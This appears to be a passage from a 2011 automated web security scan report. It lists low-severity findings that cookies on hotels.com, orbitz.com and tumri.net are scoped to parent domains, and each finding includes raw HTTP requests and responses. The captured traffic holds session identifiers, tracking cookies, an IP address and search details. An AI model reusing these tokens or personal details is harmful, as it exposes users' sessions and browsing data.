Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
13.168. http://www.hotels.com/selectors/en_US/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMSUzQTExNC4xLjAlM0ExMjQuMS4wLmkxJTNBMTAzLjQuMS5pNiUzQTE3MS4xLjAlM0ExMzAuMS4xLmkyJTNBNDguMS4wJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTE0Mi4wLjAuaTQlM0ExOTguMi4wJTNBMTQ1LjAuMC5pMiUzQTIwMC4wLjAlM0ExMzcuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE5MC4zLjAlM0ExNTIuMC4wLmkyJTNBMTM0LjAuMSUzQTE5Ni4xLjAlM0EyLjIuMSUzQTIwOS4wLjElM0ExNDcuNi4wLmk2JTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTMyLjIuMC5pMiUzQTEyMi4xLjAuaTMlM0ExMzguMS4wJTNBMTQ5LjAuMC5pMSUzQTEwNC4wLjElM0ExOTUuMC4wJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:44 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:44 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...
13.169. http://www.orbitz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
13.170. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
13.171. http://www.orbitz.com/App/ViewDHTMLCalendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...
13.172. http://www.orbitz.com/App/ViewFlightSearchResults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
13.173. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
13.174. http://www.tumri.net/ads/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/ads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
